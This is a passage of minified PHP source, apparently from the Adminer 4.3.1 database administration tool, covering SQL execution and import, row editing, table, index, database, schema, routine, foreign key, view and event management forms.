|^#~',$Vc)?"\n":preg_quote($Vc)."|\\\\."))).'|$)s',$H,$B,PREG_OFFSET_CAPTURE,$D)){$vg=$B[0][0];if(!$vg&&$Xc&&!feof($Xc))$H.=fread($Xc,1e5);else{$D=$B[0][1]+strlen($vg);if($vg[0]!="\\")break;}}}else{$nc=false;$Tf=substr($H,0,$Ef);$rb++;$Mf="<pre id='sql-$rb'><code class='jush-$x'>".$b->sqlCommandQuery($Tf)."</code></pre>\n";if($x=="sqlite"&&preg_match("~^$Rg*+ATTACH\\b~i",$Tf,$B)){echo$Mf,"<p class='error'>".lang(139)."\n";$sc[]=" <a href='#sql-$rb'>$rb</a>";if($_POST["error_stops"])break;}else{if(!$_POST["only_errors"]){echo$Mf;ob_flush();flush();}$Vg=microtime(true);if($g->multi_query($Tf)&&is_object($h)&&preg_match("~^$Rg*+USE\\b~i",$Tf))$h->query($Tf);do{$I=$g->store_result();$vh=" <span class='time'>(".format_time($Vg).")</span>".(strlen($Tf)<1000?" <a href='".h(ME)."sql=".urlencode(trim($Tf))."'>".lang(10)."</a>":"");if($g->error){echo($_POST["only_errors"]?$Mf:""),"<p class='error'>".lang(140).($g->errno?" ($g->errno)":"").": ".error()."\n";$sc[]=" <a href='#sql-$rb'>$rb</a>";if($_POST["error_stops"])break
2;}elseif(is_object($I)){$z=$_POST["limit"];$gf=select($I,$h,array(),$z);if(!$_POST["only_errors"]){echo"<form action='' method='post'>\n";$Je=$I->num_rows;echo"<p>".($Je?($z&&$Je>$z?lang(141,$z):"").lang(142,$Je):""),$vh;$t="export-$rb";$Ac=", <a href='#$t' onclick=\"return !toggle('$t');\">".lang(70)."</a><span id='$t' class='hidden'>: ".html_select("output",$b->dumpOutput(),$xa["output"])." ".html_select("format",$ec,$xa["format"])."<input type='hidden' name='query' value='".h($Tf)."'>"." <input type='submit' name='export' value='".lang(70)."'><input type='hidden' name='token' value='$Dh'></span>\n";if($h&&preg_match("~^($Rg|\\()*+SELECT\\b~i",$Tf)&&($_c=explain($h,$Tf))){$t="explain-$rb";echo", <a href='#$t' onclick=\"return !toggle('$t');\">EXPLAIN</a>$Ac","<div id='$t' class='hidden'>\n";select($_c,$h,$gf);echo"</div>\n";}else
echo$Ac;echo"</form>\n";}}else{if(preg_match("~^$Rg*+(CREATE|DROP|ALTER)$Rg++(DATABASE|SCHEMA)\\b~i",$Tf)){restart_session();set_session("dbs",null);stop_session();}if(!$_POST["only_errors"])echo"<p class='message' title='".h($g->info)."'>".lang(143,$g->affected_rows)."$vh\n";}$Vg=microtime(true);}while($g->next_result());}$H=substr($H,$D);$D=0;}}}}if($nc)echo"<p class='message'>".lang(144)."\n";elseif($_POST["only_errors"]){echo"<p class='message'>".lang(145,$rb-count($sc))," <span class='time'>(".format_time($Fh).")</span>\n";}elseif($sc&&$rb>1)echo"<p class='error'>".lang(140).": ".implode("",$sc)."\n";}else
echo"<p class='error'>".upload_error($H)."\n";}echo'
<form action="" method="post" enctype="multipart/form-data" id="form">
';$xc="<input type='submit' value='".lang(146)."' title='Ctrl+Enter'>";if(!isset($_GET["import"])){$Tf=$_GET["sql"];if($_POST)$Tf=$_POST["query"];elseif($_GET["history"]=="all")$Tf=$jd;elseif($_GET["history"]!="")$Tf=$jd[$_GET["history"]][0];echo"<p>";textarea("query",$Tf,20);echo($_POST?"":"<script type='text/javascript'>document.getElementsByTagName('textarea')[0].focus();</script>\n"),"<p>$xc\n",lang(147).": <input type='number' name='limit' class='size' value='".h($_POST?$_POST["limit"]:$_GET["limit"])."'>\n";}else{echo"<fieldset><legend>".lang(148)."</legend><div>",(ini_bool("file_uploads")?"SQL (< ".ini_get("upload_max_filesize")."B): <input type='file' name='sql_file[]' multiple>\n$xc":lang(149)),"</div></fieldset>\n","<fieldset><legend>".lang(150)."</legend><div>",lang(151,"<code>adminer.sql".(extension_loaded("zlib")?"[.gz]":"")."</code>"),' <input type="submit" name="webfile" value="'.lang(152).'">',"</div></fieldset>\n","<p>";}echo
checkbox("error_stops",1,($_POST?$_POST["error_stops"]:isset($_GET["import"])),lang(153))."\n",checkbox("only_errors",1,($_POST?$_POST["only_errors"]:isset($_GET["import"])),lang(154))."\n","<input type='hidden' name='token' value='$Dh'>\n";if(!isset($_GET["import"])&&$jd){print_fieldset("history",lang(155),$_GET["history"]!="");for($X=end($jd);$X;$X=prev($jd)){$y=key($jd);list($Tf,$vh,$ic)=$X;echo'<a href="'.h(ME."sql=&history=$y").'">'.lang(10)."</a>"." <span class='time' title='".@date('Y-m-d',$vh)."'>".@date("H:i:s",$vh)."</span>"." <code class='jush-$x'>".shorten_utf8(ltrim(str_replace("\n"," ",str_replace("\r","",preg_replace('~^(#|-- ).*~m','',$Tf)))),80,"</code>").($ic?" <span class='time'>($ic)</span>":"")."<br>\n";}echo"<input type='submit' name='clear' value='".lang(156)."'>\n","<a href='".h(ME."sql=&history=all")."'>".lang(157)."</a>\n","</div></fieldset>\n";}echo'</form>
';}elseif(isset($_GET["edit"])){$a=$_GET["edit"];$p=fields($a);$Z=(isset($_GET["select"])?(count($_POST["check"])==1?where_check($_POST["check"][0],$p):""):where($_GET,$p));$Zh=(isset($_GET["select"])?$_POST["edit"]:$Z);foreach($p
as$C=>$o){if(!isset($o["privileges"][$Zh?"update":"insert"])||$b->fieldName($o)=="")unset($p[$C]);}if($_POST&&!$n&&!isset($_GET["select"])){$A=$_POST["referer"];if($_POST["insert"])$A=($Zh?null:$_SERVER["REQUEST_URI"]);elseif(!preg_match('~^.+&select=.+$~',$A))$A=ME."select=".urlencode($a);$w=indexes($a);$Uh=unique_array($_GET["where"],$w);$Wf="\nWHERE $Z";if(isset($_POST["delete"]))queries_redirect($A,lang(158),$Xb->delete($a,$Wf,!$Uh));else{$O=array();foreach($p
as$C=>$o){$X=process_input($o);if($X!==false&&$X!==null)$O[idf_escape($C)]=$X;}if($Zh){if(!$O)redirect($A);queries_redirect($A,lang(159),$Xb->update($a,$O,$Wf,!$Uh));if(is_ajax()){page_headers();page_messages($n);exit;}}else{$I=$Xb->insert($a,$O);$Wd=($I?last_id():0);queries_redirect($A,lang(160,($Wd?" $Wd":"")),$I);}}}$K=null;if($_POST["save"])$K=(array)$_POST["fields"];elseif($Z){$M=array();foreach($p
as$C=>$o){if(isset($o["privileges"]["select"])){$Ga=convert_field($o);if($_POST["clone"]&&$o["auto_increment"])$Ga="''";if($x=="sql"&&preg_match("~enum|set~",$o["type"]))$Ga="1*".idf_escape($C);$M[]=($Ga?"$Ga AS ":"").idf_escape($C);}}$K=array();if(!support("table"))$M=array("*");if($M){$I=$Xb->select($a,$M,array($Z),$M,array(),(isset($_GET["select"])?2:1));$K=$I->fetch_assoc();if(!$K)$K=false;if(isset($_GET["select"])&&(!$K||$I->fetch_assoc()))$K=null;}}if(!support("table")&&!$p){if(!$Z){$I=$Xb->select($a,array("*"),$Z,array("*"));$K=($I?$I->fetch_assoc():false);if(!$K)$K=array($Xb->primary=>"");}if($K){foreach($K
as$y=>$X){if(!$Z)$K[$y]=null;$p[$y]=array("field"=>$y,"null"=>($y!=$Xb->primary),"auto_increment"=>($y==$Xb->primary));}}}edit_form($a,$p,$K,$Zh);}elseif(isset($_GET["create"])){$a=$_GET["create"];$uf=array();foreach(array('HASH','LINEAR HASH','KEY','LINEAR KEY','RANGE','LIST')as$y)$uf[$y]=$y;$dg=referencable_primary($a);$Tc=array();foreach($dg
as$gh=>$o)$Tc[str_replace("`","``",$gh)."`".str_replace("`","``",$o["field"])]=$gh;$jf=array();$S=array();if($a!=""){$jf=fields($a);$S=table_status($a);if(!$S)$n=lang(9);}$K=$_POST;$K["fields"]=(array)$K["fields"];if($K["auto_increment_col"])$K["fields"][$K["auto_increment_col"]]["auto_increment"]=true;if($_POST&&!process_fields($K["fields"])&&!$n){if($_POST["drop"])queries_redirect(substr(ME,0,-1),lang(161),drop_tables(array($a)));else{$p=array();$Da=array();$di=false;$Rc=array();$if=reset($jf);$Aa=" FIRST";foreach($K["fields"]as$y=>$o){$q=$Tc[$o["type"]];$Ph=($q!==null?$dg[$q]:$o);if($o["field"]!=""){if(!$o["has_default"])$o["default"]=null;if($y==$K["auto_increment_col"])$o["auto_increment"]=true;$Rf=process_field($o,$Ph);$Da[]=array($o["orig"],$Rf,$Aa);if($Rf!=process_field($if,$if)){$p[]=array($o["orig"],$Rf,$Aa);if($o["orig"]!=""||$Aa)$di=true;}if($q!==null)$Rc[idf_escape($o["field"])]=($a!=""&&$x!="sqlite"?"ADD":" ").format_foreign_key(array('table'=>$Tc[$o["type"]],'source'=>array($o["field"]),'target'=>array($Ph["field"]),'on_delete'=>$o["on_delete"],));$Aa=" AFTER ".idf_escape($o["field"]);}elseif($o["orig"]!=""){$di=true;$p[]=array($o["orig"]);}if($o["orig"]!=""){$if=next($jf);if(!$if)$Aa="";}}$wf="";if($uf[$K["partition_by"]]){$xf=array();if($K["partition_by"]=='RANGE'||$K["partition_by"]=='LIST'){foreach(array_filter($K["partition_names"])as$y=>$X){$Y=$K["partition_values"][$y];$xf[]="\n PARTITION ".idf_escape($X)." VALUES ".($K["partition_by"]=='RANGE'?"LESS THAN":"IN").($Y!=""?" ($Y)":" MAXVALUE");}}$wf.="\nPARTITION BY $K[partition_by]($K[partition])".($xf?" (".implode(",",$xf)."\n)":($K["partitions"]?" PARTITIONS ".(+$K["partitions"]):""));}elseif(support("partitioning")&&preg_match("~partitioned~",$S["Create_options"]))$wf.="\nREMOVE PARTITIONING";$se=lang(162);if($a==""){cookie("adminer_engine",$K["Engine"]);$se=lang(163);}$C=trim($K["name"]);queries_redirect(ME.(support("table")?"table=":"select=").urlencode($C),$se,alter_table($a,$C,($x=="sqlite"&&($di||$Rc)?$Da:$p),$Rc,($K["Comment"]!=$S["Comment"]?$K["Comment"]:null),($K["Engine"]&&$K["Engine"]!=$S["Engine"]?$K["Engine"]:""),($K["Collation"]&&$K["Collation"]!=$S["Collation"]?$K["Collation"]:""),($K["Auto_increment"]!=""?number($K["Auto_increment"]):""),$wf));}}page_header(($a!=""?lang(42):lang(71)),$n,array("table"=>$a),h($a));if(!$_POST){$K=array("Engine"=>$_COOKIE["adminer_engine"],"fields"=>array(array("field"=>"","type"=>(isset($Rh["int"])?"int":(isset($Rh["integer"])?"integer":"")))),"partition_names"=>array(""),);if($a!=""){$K=$S;$K["name"]=$a;$K["fields"]=array();if(!$_GET["auto_increment"])$K["Auto_increment"]="";foreach($jf
as$o){$o["has_default"]=isset($o["default"]);$K["fields"][]=$o;}if(support("partitioning")){$Yc="FROM information_schema.PARTITIONS WHERE TABLE_SCHEMA = ".q(DB)." AND TABLE_NAME = ".q($a);$I=$g->query("SELECT PARTITION_METHOD, PARTITION_ORDINAL_POSITION, PARTITION_EXPRESSION $Yc ORDER BY PARTITION_ORDINAL_POSITION DESC LIMIT 1");list($K["partition_by"],$K["partitions"],$K["partition"])=$I->fetch_row();$xf=get_key_vals("SELECT PARTITION_NAME, PARTITION_DESCRIPTION $Yc AND PARTITION_NAME != '' ORDER BY PARTITION_ORDINAL_POSITION");$xf[""]="";$K["partition_names"]=array_keys($xf);$K["partition_values"]=array_values($xf);}}}$ob=collations();$pc=engines();foreach($pc
as$oc){if(!strcasecmp($oc,$K["Engine"])){$K["Engine"]=$oc;break;}}echo'
<form action="" method="post" id="form">
<p>
';if(support("columns")||$a==""){echo
lang(164),': <input name="name" maxlength="64" value="',h($K["name"]),'" autocapitalize="off">
';if($a==""&&!$_POST){?><script type='text/javascript'>focus(document.getElementById('form')['name']);</script><?php }echo($pc?"<select name='Engine' onchange='helpClose();'".on_help("getTarget(event).value",1).">".optionlist(array(""=>"(".lang(165).")")+$pc,$K["Engine"])."</select>":""),' ',($ob&&!preg_match("~sqlite|mssql~",$x)?html_select("Collation",array(""=>"(".lang(92).")")+$ob,$K["Collation"]):""),' <input type="submit" value="',lang(14),'">
';}echo'
';if(support("columns")){echo'<table cellspacing="0" id="edit-fields" class="nowrap">
';$tb=($_POST?$_POST["comments"]:$K["Comment"]!="");if(!$_POST&&!$tb){foreach($K["fields"]as$o){if($o["comment"]!=""){$tb=true;break;}}}edit_fields($K["fields"],$ob,"TABLE",$Tc,$tb);echo'</table>
<p>
',lang(48),': <input type="number" name="Auto_increment" size="6" value="',h($K["Auto_increment"]),'">
',checkbox("defaults",1,true,lang(166),"columnShow(this.checked, 5)","jsonly");if(!$_POST["defaults"]){echo'<script type="text/javascript">editingHideDefaults()</script>';}echo(support("comment")?"<label><input type='checkbox' name='comments' value='1' class='jsonly' onclick=\"columnShow(this.checked, 6); toggle('Comment'); if (this.checked) this.form['Comment'].focus();\"".($tb?" checked":"").">".lang(47)."</label>".' <input name="Comment" id="Comment" value="'.h($K["Comment"]).'" maxlength="'.($g->server_info>=5.5?2048:60).'"'.($tb?'':' class="hidden"').'>':''),'<p>
<input type="submit" value="',lang(14),'">
';}echo'
';if($a!=""){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}if(support("partitioning")){$vf=preg_match('~RANGE|LIST~',$K["partition_by"]);print_fieldset("partition",lang(167),$K["partition_by"]);echo'<p>
',"<select name='partition_by' onchange='partitionByChange(this);'".on_help("getTarget(event).value.replace(/./, 'PARTITION BY \$&')",1).">".optionlist(array(""=>"")+$uf,$K["partition_by"])."</select>",'(<input name="partition" value="',h($K["partition"]),'">)
',lang(168),': <input type="number" name="partitions" class="size',($vf||!$K["partition_by"]?" hidden":""),'" value="',h($K["partitions"]),'">
<table cellspacing="0" id="partition-table"',($vf?"":" class='hidden'"),'>
<thead><tr><th>',lang(169),'<th>',lang(170),'</thead>
';foreach($K["partition_names"]as$y=>$X){echo'<tr>','<td><input name="partition_names[]" value="'.h($X).'"'.($y==count($K["partition_names"])-1?' onchange="partitionNameChange(this);"':'').' autocapitalize="off">','<td><input name="partition_values[]" value="'.h($K["partition_values"][$y]).'">';}echo'</table>
</div></fieldset>
';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["indexes"])){$a=$_GET["indexes"];$td=array("PRIMARY","UNIQUE","INDEX");$S=table_status($a,true);if(preg_match('~MyISAM|M?aria'.($g->server_info>=5.6?'|InnoDB':'').'~i',$S["Engine"]))$td[]="FULLTEXT";if(preg_match('~MyISAM|M?aria'.($g->server_info>=5.7?'|InnoDB':'').'~i',$S["Engine"]))$td[]="SPATIAL";$w=indexes($a);$Kf=array();if($x=="mongo"){$Kf=$w["_id_"];unset($td[0]);unset($w["_id_"]);}$K=$_POST;if($_POST&&!$n&&!$_POST["add"]&&!$_POST["drop_col"]){$c=array();foreach($K["indexes"]as$v){$C=$v["name"];if(in_array($v["type"],$td)){$e=array();$ce=array();$Qb=array();$O=array();ksort($v["columns"]);foreach($v["columns"]as$y=>$d){if($d!=""){$be=$v["lengths"][$y];$Pb=$v["descs"][$y];$O[]=idf_escape($d).($be?"(".(+$be).")":"").($Pb?" DESC":"");$e[]=$d;$ce[]=($be?$be:null);$Qb[]=$Pb;}}if($e){$yc=$w[$C];if($yc){ksort($yc["columns"]);ksort($yc["lengths"]);ksort($yc["descs"]);if($v["type"]==$yc["type"]&&array_values($yc["columns"])===$e&&(!$yc["lengths"]||array_values($yc["lengths"])===$ce)&&array_values($yc["descs"])===$Qb){unset($w[$C]);continue;}}$c[]=array($v["type"],$C,$O);}}}foreach($w
as$C=>$yc)$c[]=array($yc["type"],$C,"DROP");if(!$c)redirect(ME."table=".urlencode($a));queries_redirect(ME."table=".urlencode($a),lang(171),alter_indexes($a,$c));}page_header(lang(124),$n,array("table"=>$a),h($a));$p=array_keys(fields($a));if($_POST["add"]){foreach($K["indexes"]as$y=>$v){if($v["columns"][count($v["columns"])]!="")$K["indexes"][$y]["columns"][]="";}$v=end($K["indexes"]);if($v["type"]||array_filter($v["columns"],'strlen'))$K["indexes"][]=array("columns"=>array(1=>""));}if(!$K){foreach($w
as$y=>$v){$w[$y]["name"]=$y;$w[$y]["columns"][]="";}$w[]=array("columns"=>array(1=>""));$K["indexes"]=$w;}echo'
<form action="" method="post">
<table cellspacing="0" class="nowrap">
<thead><tr>
<th id="label-type">',lang(172),'<th><input type="submit" class="wayoff">',lang(173),'<th id="label-name">',lang(174);?>
<th><noscript><input type='image' class='icon' name='add[0]' src='" . h(preg_replace("~\\?.*~", "", ME)) . "?file=plus.gif&version=4.3.1' alt='+' title='<?php echo
lang(99),'\'></noscript>
</thead>
';if($Kf){echo"<tr><td>PRIMARY<td>";foreach($Kf["columns"]as$y=>$d){echo
select_input(" disabled",$p,$d),"<label><input disabled type='checkbox'>".lang(56)."</label> ";}echo"<td><td>\n";}$Jd=1;foreach($K["indexes"]as$v){if(!$_POST["drop_col"]||$Jd!=key($_POST["drop_col"])){echo"<tr><td>".html_select("indexes[$Jd][type]",array(-1=>"")+$td,$v["type"],($Jd==count($K["indexes"])?"indexesAddRow(this);":1),"label-type"),"<td>";ksort($v["columns"]);$s=1;foreach($v["columns"]as$y=>$d){echo"<span>".select_input(" name='indexes[$Jd][columns][$s]' onchange=\"".($s==count($v["columns"])?"indexesAddColumn":"indexesChangeColumn")."(this, '".h(js_escape($x=="sql"?"":$_GET["indexes"]."_"))."');\" title='".lang(45)."'",($p?array_combine($p,$p):$p),$d),($x=="sql"||$x=="mssql"?"<input type='number' name='indexes[$Jd][lengths][$s]' class='size' value='".h($v["lengths"][$y])."' title='".lang(97)."'>":""),($x!="sql"?checkbox("indexes[$Jd][descs][$s]",1,$v["descs"][$y],lang(56)):"")," </span>";$s++;}echo"<td><input name='indexes[$Jd][name]' value='".h($v["name"])."' autocapitalize='off' aria-labelledby='label-name'>\n","<td><input type='image' class='icon' name='drop_col[$Jd]' src='".h(preg_replace("~\\?.*~","",ME))."?file=cross.gif&version=4.3.1' alt='x' title='".lang(102)."' onclick=\"return !editingRemoveRow(this, 'indexes\$1[type]');\">\n";}$Jd++;}echo'</table>
<p>
<input type="submit" value="',lang(14),'">
<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["database"])){$K=$_POST;if($_POST&&!$n&&!isset($_POST["add_x"])){$C=trim($K["name"]);if($_POST["drop"]){$_GET["db"]="";queries_redirect(remove_from_uri("db|database"),lang(175),drop_databases(array(DB)));}elseif(DB!==$C){if(DB!=""){$_GET["db"]=$C;queries_redirect(preg_replace('~\bdb=[^&]*&~','',ME)."db=".urlencode($C),lang(176),rename_database($C,$K["collation"]));}else{$l=explode("\n",str_replace("\r","",$C));$ah=true;$Vd="";foreach($l
as$m){if(count($l)==1||$m!=""){if(!create_database($m,$K["collation"]))$ah=false;$Vd=$m;}}restart_session();set_session("dbs",null);queries_redirect(ME."db=".urlencode($Vd),lang(177),$ah);}}else{if(!$K["collation"])redirect(substr(ME,0,-1));query_redirect("ALTER DATABASE ".idf_escape($C).(preg_match('~^[a-z0-9_]+$~i',$K["collation"])?" COLLATE $K[collation]":""),substr(ME,0,-1),lang(178));}}page_header(DB!=""?lang(64):lang(106),$n,array(),h(DB));$ob=collations();$C=DB;if($_POST)$C=$K["name"];elseif(DB!="")$K["collation"]=db_collation(DB,$ob);elseif($x=="sql"){foreach(get_vals("SHOW GRANTS")as$ad){if(preg_match('~ ON (`(([^\\\\`]|``|\\\\.)*)%`\\.\\*)?~',$ad,$B)&&$B[1]){$C=stripcslashes(idf_unescape("`$B[2]`"));break;}}}echo'
<form action="" method="post">
<p>
',($_POST["add_x"]||strpos($C,"\n")?'<textarea id="name" name="name" rows="10" cols="40">'.h($C).'</textarea><br>':'<input name="name" id="name" value="'.h($C).'" maxlength="64" autocapitalize="off">')."\n".($ob?html_select("collation",array(""=>"(".lang(92).")")+$ob,$K["collation"]).doc_link(array('sql'=>"charset-charsets.html",'mssql'=>"ms187963.aspx",)):"");?>
<script type='text/javascript'>focus(document.getElementById('name'));</script>
<input type="submit" value="<?php echo
lang(14),'">
';if(DB!="")echo"<input type='submit' name='drop' value='".lang(119)."'".confirm().">\n";elseif(!$_POST["add_x"]&&$_GET["db"]=="")echo"<input type='image' class='icon' name='add' src='".h(preg_replace("~\\?.*~","",ME))."?file=plus.gif&version=4.3.1' alt='+' title='".lang(99)."'>\n";echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["scheme"])){$K=$_POST;if($_POST&&!$n){$_=preg_replace('~ns=[^&]*&~','',ME)."ns=";if($_POST["drop"])query_redirect("DROP SCHEMA ".idf_escape($_GET["ns"]),$_,lang(179));else{$C=trim($K["name"]);$_.=urlencode($C);if($_GET["ns"]=="")query_redirect("CREATE SCHEMA ".idf_escape($C),$_,lang(180));elseif($_GET["ns"]!=$C)query_redirect("ALTER SCHEMA ".idf_escape($_GET["ns"])." RENAME TO ".idf_escape($C),$_,lang(181));else
redirect($_);}}page_header($_GET["ns"]!=""?lang(65):lang(66),$n);if(!$K)$K["name"]=$_GET["ns"];echo'
<form action="" method="post">
<p><input name="name" id="name" value="',h($K["name"]);?>" autocapitalize="off">
<script type='text/javascript'>focus(document.getElementById('name'));</script>
<input type="submit" value="<?php echo
lang(14),'">
';if($_GET["ns"]!="")echo"<input type='submit' name='drop' value='".lang(119)."'".confirm().">\n";echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["call"])){$da=$_GET["call"];page_header(lang(182).": ".h($da),$n);$rg=routine($da,(isset($_GET["callf"])?"FUNCTION":"PROCEDURE"));$rd=array();$nf=array();foreach($rg["fields"]as$s=>$o){if(substr($o["inout"],-3)=="OUT")$nf[$s]="@".idf_escape($o["field"])." AS ".idf_escape($o["field"]);if(!$o["inout"]||substr($o["inout"],0,2)=="IN")$rd[]=$s;}if(!$n&&$_POST){$Ya=array();foreach($rg["fields"]as$y=>$o){if(in_array($y,$rd)){$X=process_input($o);if($X===false)$X="''";if(isset($nf[$y]))$g->query("SET @".idf_escape($o["field"])." = $X");}$Ya[]=(isset($nf[$y])?"@".idf_escape($o["field"]):$X);}$H=(isset($_GET["callf"])?"SELECT":"CALL")." ".table($da)."(".implode(", ",$Ya).")";echo"<p><code class='jush-$x'>".h($H)."</code> <a href='".h(ME)."sql=".urlencode($H)."'>".lang(10)."</a>\n";if(!$g->multi_query($H))echo"<p class='error'>".error()."\n";else{$h=connect();if(is_object($h))$h->select_db(DB);do{$I=$g->store_result();if(is_object($I))select($I,$h);else
echo"<p class='message'>".lang(183,$g->affected_rows)."\n";}while($g->next_result());if($nf)select($g->query("SELECT ".implode(", ",$nf)));}}echo'
<form action="" method="post">
';if($rd){echo"<table cellspacing='0'>\n";foreach($rd
as$y){$o=$rg["fields"][$y];$C=$o["field"];echo"<tr><th>".$b->fieldName($o);$Y=$_POST["fields"][$C];if($Y!=""){if($o["type"]=="enum")$Y=+$Y;if($o["type"]=="set")$Y=array_sum($Y);}input($o,$Y,(string)$_POST["function"][$C]);echo"\n";}echo"</table>\n";}echo'<p>
<input type="submit" value="',lang(182),'">
<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["foreign"])){$a=$_GET["foreign"];$C=$_GET["name"];$K=$_POST;if($_POST&&!$n&&!$_POST["add"]&&!$_POST["change"]&&!$_POST["change-js"]){$se=($_POST["drop"]?lang(184):($C!=""?lang(185):lang(186)));$A=ME."table=".urlencode($a);if(!$_POST["drop"]){$K["source"]=array_filter($K["source"],'strlen');ksort($K["source"]);$oh=array();foreach($K["source"]as$y=>$X)$oh[$y]=$K["target"][$y];$K["target"]=$oh;}if($x=="sqlite")queries_redirect($A,$se,recreate_table($a,$a,array(),array(),array(" $C"=>($_POST["drop"]?"":" ".format_foreign_key($K)))));else{$c="ALTER TABLE ".table($a);$Zb="\nDROP ".($x=="sql"?"FOREIGN KEY ":"CONSTRAINT ").idf_escape($C);if($_POST["drop"])query_redirect($c.$Zb,$A,$se);else{query_redirect($c.($C!=""?"$Zb,":"")."\nADD".format_foreign_key($K),$A,$se);$n=lang(187)."<br>$n";}}}page_header(lang(188),$n,array("table"=>$a),h($a));if($_POST){ksort($K["source"]);if($_POST["add"])$K["source"][]="";elseif($_POST["change"]||$_POST["change-js"])$K["target"]=array();}elseif($C!=""){$Tc=foreign_keys($a);$K=$Tc[$C];$K["source"][]="";}else{$K["table"]=$a;$K["source"]=array("");}$Qg=array_keys(fields($a));$oh=($a===$K["table"]?$Qg:array_keys(fields($K["table"])));$cg=array_keys(array_filter(table_status('',true),'fk_support'));echo'
<form action="" method="post">
<p>
';if($K["db"]==""&&$K["ns"]==""){echo
lang(189),':
',html_select("table",$cg,$K["table"],"this.form['change-js'].value = '1'; this.form.submit();"),'<input type="hidden" name="change-js" value="">
<noscript><p><input type="submit" name="change" value="',lang(190),'"></noscript>
<table cellspacing="0">
<thead><tr><th id="label-source">',lang(126),'<th id="label-target">',lang(127),'</thead>
';$Jd=0;foreach($K["source"]as$y=>$X){echo"<tr>","<td>".html_select("source[".(+$y)."]",array(-1=>"")+$Qg,$X,($Jd==count($K["source"])-1?"foreignAddRow(this);":1),"label-source"),"<td>".html_select("target[".(+$y)."]",$oh,$K["target"][$y],1,"label-target");$Jd++;}echo'</table>
<p>
',lang(94),': ',html_select("on_delete",array(-1=>"")+explode("|",$Te),$K["on_delete"]),' ',lang(93),': ',html_select("on_update",array(-1=>"")+explode("|",$Te),$K["on_update"]),doc_link(array('sql'=>"innodb-foreign-key-constraints.html",'pgsql'=>"sql-createtable.html#SQL-CREATETABLE-REFERENCES",'mssql'=>"ms174979.aspx",'oracle'=>"clauses002.htm#sthref2903",)),'<p>
<input type="submit" value="',lang(14),'">
<noscript><p><input type="submit" name="add" value="',lang(191),'"></noscript>
';}if($C!=""){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["view"])){$a=$_GET["view"];$K=$_POST;$kf="VIEW";if($x=="pgsql"&&$a!=""){$P=table_status($a);$kf=strtoupper($P["Engine"]);}if($_POST&&!$n){$C=trim($K["name"]);$Ga=" AS\n$K[select]";$A=ME."table=".urlencode($C);$se=lang(192);$U=($_POST["materialized"]?"MATERIALIZED VIEW":"VIEW");if(!$_POST["drop"]&&$a==$C&&$x!="sqlite"&&$U=="VIEW"&&$kf=="VIEW")query_redirect(($x=="mssql"?"ALTER":"CREATE OR REPLACE")." VIEW ".table($C).$Ga,$A,$se);else{$qh=$C."_adminer_".uniqid();drop_create("DROP $kf ".table($a),"CREATE $U ".table($C).$Ga,"DROP $U ".table($C),"CREATE $U ".table($qh).$Ga,"DROP $U ".table($qh),($_POST["drop"]?substr(ME,0,-1):$A),lang(193),$se,lang(194),$a,$C);}}if(!$_POST&&$a!=""){$K=view($a);$K["name"]=$a;$K["materialized"]=($kf!="VIEW");if(!$n)$n=error();}page_header(($a!=""?lang(41):lang(195)),$n,array("table"=>$a),h($a));echo'
<form action="" method="post">
<p>',lang(174),': <input name="name" value="',h($K["name"]),'" maxlength="64" autocapitalize="off">
',(support("materializedview")?" ".checkbox("materialized",1,$K["materialized"],lang(121)):""),'<p>';textarea("select",$K["select"]);echo'<p>
<input type="submit" value="',lang(14),'">
';if($_GET["view"]!=""){echo'<input type="submit" name="drop" value="',lang(119),'"',confirm(),'>';}echo'<input type="hidden" name="token" value="',$Dh,'">
</form>
';}elseif(isset($_GET["event"])){$aa=$_GET["event"];$Ad=array("YEAR","QUARTER","MONTH","DAY","HOUR","MINUTE","WEEK","SECOND","YEAR_MONTH","DAY_HOUR","DAY_MINUTE","DAY_SECOND","HOUR_MINUTE","HOUR_SECOND","MINUTE_SECOND");$Wg=array("ENABLED"=>"ENABLE","DISABLED"=>"DISABLE","SLAVESIDE_DISABLED"=>"DISABLE ON SLAVE");$K=$_POST;if($_POST&&!$n){if($_POST["drop"])query_redirect("DROP EVENT ".idf_escape($aa),substr(ME,0,-1),lang(196));elseif(in_array($K["INTERVAL_FIELD"],$Ad)&&isset($Wg[$K["STATUS"]])){$wg="\nON SCHEDULE ".($K["INTERVAL_VALUE"]?"EVERY ".q($K["INTERVAL_VALUE"])." $K[INTERVAL_FIELD]".($K["STARTS"]?" STARTS ".q($K["STARTS"]):"").($K["ENDS"]?" ENDS ".q($K["ENDS"]):""):"AT ".q($K["STARTS"]))." ON COMPLETION".($K["ON_COMPLETION"]?"":" NOT")." PRESERVE";queries_redirect(substr(ME,0,-1),($aa!=""?lang(197):lang(198)),queries(($aa!=""?"ALTER EVENT ".idf_escape($aa).$wg.($aa!=$K["EVENT_NAME"]?"\nRENAME TO ".idf_escape($K["EVENT_NAME"]):""):"CREATE EVENT ".idf_escape($K["EVENT_NAME"]).$wg)."\n".$Wg[$K["STATUS"]]." COMMENT ".q($K["EVENT_COMMENT"]).rtrim(" DO\n$K[EVENT_DEFINITION]",";").";"));}}page_header(($aa!=""?lang(199).": ".h($aa):lang(200)),$n);if(!$K&&$aa!=""){$L=get_rows("SELECT * FROM information_schema.EVENTS WHERE EVENT_SCHEMA = ".q(DB)." AND EVENT_NAME = ".q($aa));$K=reset($L);}echo'
<form action="" method="post">
<table cellspacing="0">
<tr><th>',lang(174),'<td><input name="EVENT_NAME" value="',h($K["EVENT_NAME"]),'" maxlength="64" autocapitalize="off">
<tr><th title="datetime">',lang(201),'<td><input name="STARTS" value="',h("$K[EXECUTE_AT]$K[STARTS]"),'">
<tr><th title="datetime">',lang(202),'<td><input name="ENDS" value="',h($K["ENDS"]),'">
